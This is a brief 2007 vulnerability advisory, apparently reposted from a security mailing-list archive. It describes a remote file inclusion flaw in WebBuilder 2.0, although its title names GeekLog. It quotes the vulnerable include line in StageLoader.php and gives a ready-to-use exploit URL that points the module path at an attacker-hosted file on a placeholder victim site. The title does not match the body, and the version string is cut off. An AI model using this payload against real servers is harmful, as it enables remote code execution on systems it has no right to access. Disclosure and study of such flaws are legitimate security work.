Security Advisory: GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SMA-DB <= 0.3.9 (settings.
php) Remote File Inclusion Vulnerability
  WebBuilder <= 2.0 Remote File Include Vulnerability
  GeekLog <= 2. (BaseView.
php) Remote File Include Vulnerabilities
  GeekLog <= 2. (BaseView.
php) Remote File Include Vulnerabilities

From: GolD_M <hacker__(at)_w.cn>
Date: 07.02.2007
Subject: GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=
WebBuilder <= 2.0 Remote File Include Vulnerability *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_@W.Cn *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=
URL: *
http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=
V.CODE: In : /library/StageLoader.php *
require_once($GLOBALS['core']['module_path'].
'/module_common.php'); *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=
Exploit: *
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.
txt? *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com     *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

test server